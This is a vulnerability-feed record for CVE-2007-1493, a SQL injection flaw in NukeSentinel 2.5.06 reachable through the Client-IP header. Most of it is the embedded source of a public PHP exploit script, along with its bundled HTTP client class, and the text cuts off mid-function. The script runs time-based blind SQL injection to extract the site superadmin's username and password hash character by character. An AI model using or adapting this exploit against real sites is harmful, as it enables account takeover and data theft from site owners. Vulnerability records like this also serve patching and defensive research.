ID CVE-2007-1493 Type cve Reporter cve@mitre.org Modified 2018-10-16T16:38:00
Description
nukesentinel.php in NukeSentinel 2.5.06 and earlier uses a permissive regular expression to validate an IP address, which allows remote attackers to execute arbitrary SQL commands via the Client-IP HTTP header, due to an incomplete patch for CVE-2007-1172.
{"exploitdb": [{"lastseen": "2016-01-31T18:30:40", "bulletinFamily": "exploit", "description": "NukeSentinel = 4.0.24) Remote SQL Injection Exploit. CVE-2007-1493. Webapps exploit for php platform", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "EDB-ID:3450", "href": "https://www.exploit-db.com/exploits/3450/", "type": "exploitdb", "title": "NukeSentinel <= 2.5.06 - Remote SQL Injection Exploit", "sourceData": "#!/usr/bin/php\r\n<?php\r\nerror_reporting(E_ALL ^ E_NOTICE);\r\n\r\nif($argc < 3)\r\n{\r\nprint(\"\r\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\r\n-----------------------------------------------------------------------\r\nPHP conditions: none\r\nCMS conditions: disable_switch<=0 (module activated), track_active=1\r\n Credits: DarkFig <gmdarkfig@gmail.com>\r\n URL: http://www.acid-root.new.fr/\r\n-----------------------------------------------------------------------\r\n Usage: $argv[0] -url <> [Options]\r\n Params: -url For example http://victim.com/phpnuke/ \r\nOptions: -prefix Table prefix (default=nuke)\r\n -debug Debug mod activated (debug_ns.html)\r\n -truetime Server response time which returns true\r\n -benchmark You can change the value used in benchmark()\r\n -proxy If you wanna use a proxy <proxyhost:proxyport> \r\n -proxyauth Basic authentification <proxyuser:proxypwd>\r\nExample: $argv[0] -url http://localhost/phpnuke/ -debug\r\n Note: This exploit is based on the server response time\r\n If you have some problems use -debug, -benchmark, -truetime\r\n-----------------------------------------------------------------------\r\n\");exit(1);\r\n}\r\n\r\n$url = getparam(\"url\",1);\r\n$tblprfix = (getparam(\"prefix\")!=\"\") ? getparam(\"prefix\") : 'nuke';\r\n$debug = (getparam(\"debug\")!=\"\") ? 1 : 0;\r\n$benchmark = (getparam(\"benchmark\")!=\"\") ? getparam(\"benchmark\") : '100000000';\r\n$proxy = getparam(\"proxy\");\r\n$proxyauth = getparam(\"proxyauth\");\r\n\r\n$xpl = new phpsploit();\r\n$xpl->agent('Mozilla Firefox');\r\n$xpl->allowredirection(0);\r\n$xpl->cookiejar(0);\r\n\r\nif($proxy) $xpl->proxy($proxy);\r\nif($proxyauth) $xpl->proxyauth($proxyauth);\r\nif($debug) debug(1);\r\n\r\nprint \"\\nUsername: \";bruteforce('aid');\r\nprint \"\\nPassword: \";bruteforce('pwd');\r\nexit(0);\r\n\r\nfunction bruteforce($field)\r\n{\r\n\tglobal $url,$xpl,$tblprfix,$truetime,$debug,$benchmark,$sql,$bef,$aft,$fak,$b,$c,$f,$dfield,$a,$result; \r\n\t$a=0;$v='';$dfield=$field;\r\n\t\r\n\tif(eregi('a',$field)) { $b='-1';$c='127';} # aid charset\r\n\telse { $b='46';$c='70'; } # pwd charset\r\n\t\r\n\twhile(TRUE)\r\n\t{\r\n\t\t$a++;\r\n\t\tfor($e=$b;$e<=$c;$e++)\r\n\t\t{\r\n\t\t\t$fak = rand(128,254).'.'\r\n\t\t\t .rand(128,254).'.'\r\n\t\t\t .rand(128,254).'.'\r\n\t\t\t .rand(128,254);\r\n\r\n if($e==$b) $f=\"TST\";\r\n\t\t\telseif($e==($b+1)) $f=\"NULL\";\r\n\t\t\telse $f=$e;\r\n\r\n # $db->sql_query(\"INSERT INTO `\".$prefix.\"_nsnst_tracked_ips` (`user_id`, `username`, `date`,\r\n # `ip_addr`, `ip_long`, `page`, `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`,\r\n # `remote_port`, `request_method`, `c2c`) VALUES ('\".$nsnst_const['ban_user_id'].\"', '$ban_username2',\r\n # '\".$nsnst_const['ban_time'].\"', '\".$nsnst_const['remote_ip'].\"', '\".$nsnst_const['remote_long'].\"',\r\n # '$pg', '$user_agent', '$refered_from', '\".$nsnst_const['forward_ip'].\"', '\".$nsnst_const['client_ip'].\"',\r\n # '\".$nsnst_const['remote_addr'].\"', '\".$nsnst_const['remote_port'].\"', '\".$nsnst_const['request_method'].\"',\r\n # '$c2c')\");\r\n #\r\n\t\t\t$sql = \"(SELECT IF((SUBSTR(\";\r\n\t\t\t$sql .= ($f==\"TST\") ? \"(SELECT 1)\" : \"(SELECT $field FROM ${tblprfix}_authors WHERE radminsuper=1)\";\r\n\t\t\t$sql .= ($f==\"TST\") ? \",1\" : \",$a\";\r\n\t\t\t$sql .= \",1)=CHAR(\";\r\n\t\t\t$sql .= ($f==\"TST\") ? \"49\" : \"$f\";\r\n\t\t\t$sql .= \")),BENCHMARK($benchmark,CHAR(66))\";\r\n\t\t\t$sql .= \",1)),1,1,1,1,1,1,1,1,1)/*\";\r\n\r\n\t\t\t$bef = time();\r\n\t\t\t$xpl->reset(\"header\");\r\n\t\t\t\r\n\t\t\t# 2.5.06 CHANGES (2007-03-02):\r\n\t\t\t# + Corrected a problem causing valid ip users to be tagged as invalid users\r\n # ...The old sploit will not work for this version but it's always vulnerable, you missed something.\r\n #\r\n\t\t\t# if(!ereg(\"^([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['remote_ip']))\r\n # {$nsnst_const['remote_ip'] = \"none\"; }\r\n\t\t\t#\r\n\t\t\t$xpl->addheader(\"Client-IP\",\"$fak',$sql\");\r\n\t\t\t$xpl->get($url);\r\n\t\t\t$aft = time();\r\n\r\n\t\t\tif($f==\"TST\") $truetime=($aft-$bef);\r\n\t\t\tif(getparam(\"truetime\")!=\"\") $truetime = getparam(\"truetime\");\r\n\t\t\t\r\n\t\t\tif((($aft-$bef) >= $truetime) AND ($f != \"TST\")) $result='TRUE';\r\n\t\t\telse $result='FALSE';\r\n\t\t\tif($debug) debug();\r\n\t\t\t\r\n\t\t\tif($result=='TRUE')\r\n\t\t\t{\r\n\t\t\t\tif($f != \"NULL\")\r\n\t\t\t\t{\r\n\t\t\t\t\tprint strtolower(chr($f));\r\n\t\t\t\t\t$v .= chr($f);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $v;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t# Retry if no char found\r\n\t\t\tif($f==$c) $a--;\r\n\t\t}\r\n\t}\r\n}\r\n\r\nfunction debug($first='')\r\n{\r\n\tglobal $tblprfix,$truetime,$debug,$benchmark,$sql,$bef,$aft,$fak,$b,$c,$f,$dfield,$a,$result;\r\n\tif($first)\r\n\t{\r\n\t\t$handle = fopen(\"debug_ns.html\",\"w+\");\r\n\t\t$data = \"<h1><div align='center'>NukeSentinel <= 2.5.06 SQL Injection (Debug)</div></h1>\r\n\t\t<pre><table width='0' border='1' align='center' cellspacing='0'><tr>\r\n\t\t<td align='center'><b>REQUEST TIME</b></td>\r\n\t\t<td align='center'><b>RESPONSE TIME</b></td>\r\n\t\t<td align='center'><b>TRUETIME</b></td>\r\n\t\t<td align='center'><b>BENCHMARK</b></td>\r\n\t\t<td align='center'><b>RESULT</b></td>\";\r\n\t\t# <td align='center'><b>IP</b></td>\r\n\t\t$data .= \"<td align='center'><b>FIELD</b></td>\r\n\t\t<td align='center'><b>CHARSET</b></td>\r\n\t\t<td align='center'><b>SUBSTR()</b></td>\r\n\t\t<td align='center'><b>ORD()</b></td>\r\n\t\t<td align='center'><b>CHAR()</b></td>\";\r\n\t\tfwrite($handle,$data);\r\n\t\tfclose($handle);\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$handle = fopen(\"debug_ns.html\",\"a\");\r\n\t\t$data = \"<tr\";\r\n\t\t$data .= ($result=='TRUE') ? \" bgcolor='#FFFF00'\" : \"\";\r\n\t\t$data .= \">\r\n\t\t<td align='center'> \".htmlentities($bef).\" </td>\r\n\t\t<td align='center'> \".htmlentities($aft).\" </td>\r\n\t\t<td align='center'> \".htmlentities($truetime).\" </td>\r\n\t\t<td align='center'> \".htmlentities($benchmark).\" </td>\r\n\t\t<td align='center'> \".htmlentities($result).\" </td>\";\r\n\t\t# <td align='center'> \".htmlentities($fak).\" </td>\r\n\t\t$data .= \"<td align='center'> \".htmlentities($dfield).\" </td>\r\n\t\t<td align='center'> \".htmlentities(\"$b-$c\").\" </td>\r\n\t\t<td align='center'> \".htmlentities($a).\" </td>\r\n\t\t<td align='center'> \".htmlentities($f).\" </td>\r\n\t\t<td align='center'> \".htmlentities(chr($f)).\" </td></tr>\";\r\n\t\tfwrite($handle,$data);\r\n\t\tfclose($handle);\r\n\t}\r\n}\r\n\r\nfunction getparam($param,$opt='')\r\n{\r\n\tglobal $argv;\r\n\tforeach($argv as $value => $key)\r\n\t{\r\n\t\tif($key == '-'.$param) {\r\n\t\t if(!empty($argv[$value+1])) return $argv[$value+1];\r\n\t\t else return 1;\r\n\t\t}\r\n\t}\r\n\tif($opt) exit(\"\\n-$param parameter required\");\r\n\telse return;\r\n}\r\n\r\n/*\r\n * \r\n * Copyright (C) darkfig\r\n * \r\n * This program is free software; you can redistribute it and/or \r\n * modify it under the terms of the GNU General Public License \r\n * as published by the Free Software Foundation; either version 2 \r\n * of the License, or (at your option) any later version. \r\n * \r\n * This program is distributed in the hope that it will be useful, \r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of \r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \r\n * GNU General Public License for more details. \r\n * \r\n * You should have received a copy of the GNU General Public License \r\n * along with this program; if not, write to the Free Software \r\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n * \r\n * TITLE: PhpSploit Class\r\n * REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4)\r\n * VERSION: 1.2\r\n * LICENSE: GNU General Public License\r\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\r\n * FILENAME: phpsploitclass.php\r\n *\r\n * CONTACT: gmdarkfig@gmail.com (french / english)\r\n * GREETZ: Sparah, Ddx39\r\n *\r\n * DESCRIPTION:\r\n * The phpsploit is a class implementing a web user agent.\r\n * You can add cookies, headers, use a proxy server with (or without) a\r\n * basic authentification. It supports the GET and the POST method. It can\r\n * also be used like a browser with the cookiejar() function (which allow\r\n * a server to add several cookies for the next requests) and the\r\n * allowredirection() function (which allow the script to follow all\r\n * redirections sent by the server). It can return the content (or the\r\n * headers) of the request. Others useful functions can be used for debugging.\r\n * A manual is actually in development but to know how to use it, you can\r\n * read the comments.\r\n *\r\n * CHANGELOG:\r\n * [2007-01-24] (1.2)\r\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\r\n * * New: multipart/form-data enctype is now supported \r\n *\r\n * [2006-12-31] (1.1)\r\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\r\n * * New: You can now call the getheader() / getcontent() function without parameters\r\n *\r\n * [2006-12-30] (1.0)\r\n * * First version\r\n * \r\n */\r\n\r\nclass phpsploit {\r\n\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don't have to call it, this is the main function.\r\n\t *\r\n\t * @return $server_response\r\n\t */\r\n\tprivate function sock()\r\n\t{\r\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\r\n\t\telse $socket = fsockopen($this->host,$this->port);\r\n\t\t\r\n\t\tif(!$socket) die(\"Error: The host doesn't exist\");\r\n\t\t\r\n\t\tif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\";\r\n\t\telseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. \" HTTP/1.1\\r\\n\";\r\n\t\telse die(\"Error: Invalid method\");\r\n\t\t\r\n\t\tif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\";\r\n\t\t$this->packet .= \"Host: \".$this->host.\"\\r\\n\";\r\n\t\t\r\n\t\tif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\";\r\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\";\r\n\t\tif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\";\r\n\t\t\r\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\r\n\t\tif($this->method===\"post\")\r\n\t\t{\r\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\r\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\r\n\t\t}\r\n\t\telseif($this->method===\"formdata\")\r\n\t\t{\r\n\t\t\t$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\";\r\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\r\n\t\t\t$this->packet .= $this->data;\r\n\t\t}\r\n\t\t$this->packet .= \"\\r\\n\";\r\n\t\t$this->recv = '';\r\n\t\t\r\n\t\tfputs($socket,$this->packet);\r\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\r\n\t\tfclose($socket);\r\n\t\t\r\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\r\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\r\n\t\telse return $this->recv;\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to add several cookie in the\r\n\t * request. Several methods are supported:\r\n\t * \r\n\t * $this->addcookie(\"name\",\"value\");\r\n\t * or\r\n\t * $this->addcookie(\"name=newvalue\");\r\n\t * or\r\n\t * $this->addcookie(\"othername=overvalue; xx=zz; y=u\");\r\n\t * \r\n\t * @param string $cookiename\r\n\t * @param string $cookievalue\r\n\t * \r\n\t */\r\n\tpublic function addcookie($cookn,$cookv='')\r\n\t{\r\n\t\t// $this->addcookie(\"name\",\"value\"); work avec replace\r\n\t\tif(!empty($cookv))\r\n\t\t{\r\n\t\t\tif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete\r\n\t\t\tif(!empty($this->cookie))\r\n\t\t\t{\r\n\t\t\t if(preg_match(\"/$cookn=/\",$this->cookie))\r\n\t\t\t {\r\n\t\t\t \t$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie);\r\n\t\t\t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".\r\n\t\t\t }\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->cookie = $cookn.\"=\".$cookv.\";\";\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addcookie(\"name=value; othername=othervalue\");\r\n\t\telse\r\n\t\t{\r\n\t \t if(!empty($this->cookie))\r\n\t \t {\r\n\t \t \t$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);\r\n\t \t \t$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));\r\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\r\n\t \t \t{\r\n\t \t \t\tpreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches);\r\n\t \t \t\t$cookn = $matches[1];\r\n\t \t \t\t$cookv = $matches[2];\r\n\t \t \t\t$this->addcookie($cookn,$cookv);\r\n\t \t \t}\r\n\t \t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";\r\n\t\t\t \t$this->cookie = $cookn;\t\t\t\r\n\t\t\t }\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to add several headers in the\r\n\t * request. Several methods are supported:\r\n\t *\r\n\t * $this->addheader(\"headername\",\"headervalue\");\r\n\t * or\r\n\t * $this->addheader(\"headername: headervalue\");\r\n\t *\r\n\t * @param string $headername\r\n\t * @param string $headervalue\r\n\t */\r\n\tpublic function addheader($headern,$headervalue='')\r\n\t{\r\n\t\t// $this->addheader(\"name\",\"value\");\r\n\t\tif(!empty($headervalue))\r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\tif(preg_match(\"/$headern:/\",$this->header))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header .= \"\\r\\n\".$headern.\": \".$headervalue;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern.\": \".$headervalue;\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addheader(\"name: value\");\r\n\t\telse \r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\t$headarr = explode(\": \",$headern);\r\n\t\t\t\t$headern = $headarr[0];\r\n\t\t\t\t$headerv = $headarr[1];\r\n\t\t\t\t$this->addheader($headern,$headerv);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server.\r\n\t * Several methods are supported:\r\n\t * \r\n\t * $this->proxy(\"proxyip\",\"8118\");\r\n\t * or\r\n\t * $this->proxy(\"proxyip:8118\")\r\n\t *\r\n\t * @param string $proxyhost\r\n\t * @param integer $proxyport\r\n\t */\r\n\tpublic function proxy($proxy,$proxyp='')\r\n\t{\r\n\t\t// $this->proxy(\"localhost:8118\");\r\n\t\tif(empty($proxyp))\r\n\t\t{\r\n\t\t\tpreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr);\r\n\t\t\t$proxh = $proxarr[1];\r\n\t\t\t$proxp = $proxarr[2];\r\n\t\t\t$this->proxyhost=$proxh;\r\n\t\t\t$this->proxyport=$proxp;\r\n\t\t}\r\n\t\t// $this->proxy(\"localhost\",8118);\r\n\t\telse \r\n\t\t{\r\n\t\t\t$this->proxyhost=$proxy;\r\n\t\t\t$this->proxyport=intval($proxyp);\r\n\t\t}\r\n\t\tif($this->proxyport > 65535) die(\"Error: Invalid port number\");\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server\r\n\t * which requires a basic authentification. Several\r\n\t * methods are supported:\r\n\t * \r\n\t * $this->proxyauth(\"darkfig\",\"dapasswd\");\r\n\t * or\r\n\t * $this->proxyauth(\"darkfig:dapasswd\");\r\n\t *\r\n\t * @param string $proxyuser\r\n\t * @param string $proxypass\r\n\t */\r\n\tpublic function proxyauth($proxyauth,$proxypasse='')\r\n\t{\r\n\t\t// $this->proxyauth(\"darkfig:password\");\r\n\t\tif(empty($proxypasse))\r\n\t\t{\r\n\t\t\tpreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);\r\n\t\t\t$proxu = $proxautharr[1];\r\n\t\t\t$proxp = $proxautharr[2];\r\n\t\t\t$this->proxyuser=$proxu;\r\n\t\t\t$this->proxypass=$proxp;\r\n\t\t}\r\n\t\t// $this->proxyauth(\"darkfig\",\"password\");\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->proxyuser=$proxyauth;\r\n\t\t\t$this->proxypass=$proxypasse;\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function allows you to set the \"User-Agent\" header.\r\n\t * Several methods are possible to do that:\r\n\t * \r\n\t * $this->agent(\"Mozilla Firefox\");\r\n\t * or\r\n\t * $this->addheader(\"User-Agent: Mozilla Firefox\");\r\n\t * or\r\n\t * $this->addheader(\"User-Agent\",\"Mozilla Firefox\");\r\n\t * \r\n\t * @param string $useragent\r\n\t */\r\n\tpublic function agent($useragent)\r\n\t{\r\n\t\t$this->agent=$useragent;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the header which will be\r\n\t * in the next request.\r\n\t * \r\n\t * $this->showheader();\r\n\t *\r\n\t * @return $header\r\n\t */\r\n\tpublic function showheader()\r\n\t{\r\n\t\treturn $this->header;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the cookie which will be\r\n\t * in the next request.\r\n\t * \r\n\t * $this->showcookie();\r\n\t *\r\n\t * @return $storedcookies\r\n\t */\r\n\tpublic function showcookie()\r\n\t{\r\n\t\treturn $this->cookie;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the last formed\r\n\t * http request (the http packet).\r\n\t * \r\n\t * $this->showlastrequest();\r\n\t * \r\n\t * @return $last_http_request\r\n\t */\r\n\tpublic function showlastrequest()\r\n\t{\r\n\t\treturn $this->packet;\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * GET method. You can precise the port of the host.\r\n\t * \r\n\t * $this->get(\"http://localhost\");\r\n\t * $this->get(\"http://localhost:888/xd/tst.php\");\r\n\t * \r\n\t * @param string $urlwithpath\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function get($url)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\"get\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method. You can precise the port of the host.\r\n\t * \r\n\t * $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");\r\n\t *\r\n\t * @param string $urlwithpath\r\n\t * @param string $postdata\r\n\t * @return $server_response\r\n\t */\t\r\n\tpublic function post($url,$data)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\"post\";\r\n\t\t$this->data=$data;\r\n\t\treturn $this->sock();\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method using the multipart/form-data enctype. \r\n\t * \r\n\t * $array = array(\r\n\t * frmdt_url => \"http://localhost/upload.php\",\r\n\t * frmdt_boundary => \"123456\", # Optional\r\n\t * \"email\" => \"me@u.com\",\r\n\t * \"varname\" => array(\r\n\t * frmdt_type => \"image/gif\", # Optional\r\n\t * frmdt_transfert => \"binary\", # Optional\r\n\t * frmdt_filename => \"hello.php\",\r\n\t * frmdt_content => \"<?php echo ':)'; ?>\"));\r\n\t * $this->formdata($array);\r\n\t *\r\n\t * @param array $array\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function formdata($array)\r\n\t{\r\n\t\t$this->target($array[frmdt_url]);\r\n\t\t$this->method=\"formdata\";\r\n\t\t$this->data='';\r\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";\r\n\t\telse $this->boundary=$array[frmdt_boundary];\r\n\t\tforeach($array as $key => $value)\r\n\t\t{\r\n\t\t\tif(!preg_match(\"#^frmdt_(boundary|url)#\",$key))\r\n\t\t\t{\r\n\t\t\t\t$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\";\r\n\t\t\t\t$this->data .= \"Content-Disposition: form-data; name=\\\"\".$key.\"\\\";\";\r\n\t\t\t\tif(!is_array($value))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\";\r\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the content of the server response\r\n\t * without the headers.\r\n\t * \r\n\t * $this->getcontent($this->get(\"http://localhost/\"));\r\n\t * or\r\n\t * $this->getcontent();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlythecontent\r\n\t */\r\n\tpublic function getcontent($code='')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$content = explode(\"\\n\",$code);\r\n\t\t$onlycode = '';\r\n\t\tfor($i=1;$i<count($content);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1;\r\n\t\t\tif($ok) $onlycode .= $content[$i].\"\\n\";\r\n\t\t}\r\n\t\treturn $onlycode;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the headers of the server response\r\n\t * without the content.\r\n\t * \r\n\t * $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));\r\n\t * or\r\n\t * $this->getheader();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlytheheaders\r\n\t */\r\n\tpublic function getheader($code='')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$header = explode(\"\\n\",$code);\r\n\t\t$onlyheader = $header[0].\"\\n\";\r\n\t\tfor($i=1;$i<count($header);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$header[$i])) break;\r\n\t\t\t$onlyheader .= $header[$i].\"\\n\";\r\n\t\t}\r\n\t\treturn $onlyheader;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the cookiejar() function.\r\n\t * It adds the value of the \"Set-Cookie\" header in the \"Cookie\"\r\n\t * header for the next request. You don't have to call it.\r\n\t * \r\n\t * @param string $server_response\r\n\t */\r\n\tprivate function getcookie($code)\r\n\t{\r\n\t\t$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code));\r\n\t\tfor($z=0;$z<count($carr);$z++)\r\n\t\t{\r\n\t\t\tif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))\r\n\t\t\t{\r\n\t\t\t\t$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfor($i=0;$i<count($cookie);$i++)\r\n\t\t{\r\n\t\t\tpreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches);\r\n\t \t $cookn = $matches[1];\r\n\t \t $cookv = $matches[2];\r\n\t \t $this->addcookie($cookn,$cookv);\r\n\t\t}\r\n }\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don't have to call it.\r\n\t *\r\n\t * @param string $urltarg\r\n\t */\r\n\tprivate function target($urltarg)\r\n\t{\r\n\t\tif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\";\r\n\t\t$this->url=$urltarg;\r\n\t\t\r\n\t\t$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)));\r\n\t\t$this->host=$array[0];\r\n\r\n\t\tpreg_match(\"/:(\\d+)\\//\",$urltarg,$matches);\r\n\t\t$this->port=empty($matches[1]) ? 80 : $matches[1];\r\n\t\t\r\n\t\t$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg));\r\n\t\tpreg_match(\"/\\/(.*)\\//\",$temp,$matches);\r\n\t\t$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");\r\n\t\r\n\t\tif($this->port > 65535) die(\"Error: Invalid port number\");\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * extract all \"Set-Cookie\" headers values\r\n\t * and it will automatically add them into the \"Cookie\" header\r\n\t * for all next requests.\r\n\t *\r\n\t * $this->cookiejar(1); // enabled\r\n\t * $this->cookiejar(0); // disabled\r\n\t * \r\n\t */\r\n\tpublic function cookiejar($code)\r\n\t{\r\n\t\tif($code===0) $this->cookiejar='';\r\n\t\tif($code===1) $this->cookiejar=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->getcookie($code);\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * follow all redirections sent by the server.\r\n\t * \r\n\t * $this->allowredirection(1); // enabled\r\n\t * $this->allowredirection(0); // disabled\r\n\t * \r\n\t * @return $this->get($locationresponse)\r\n\t */\r\n\tpublic function allowredirection($code)\r\n\t{\r\n\t\tif($code===0) $this->allowredirection='';\r\n\t\tif($code===1) $this->allowredirection=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\tif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))\r\n\t\t\t{\r\n\t\t\t\t$location = str_replace(chr(13),'',$codearr[2]);\r\n\t\t\t\tif(!eregi(\"://\",$location))\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $this->get(\"http://\".$this->host.$this->path.$location);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\treturn 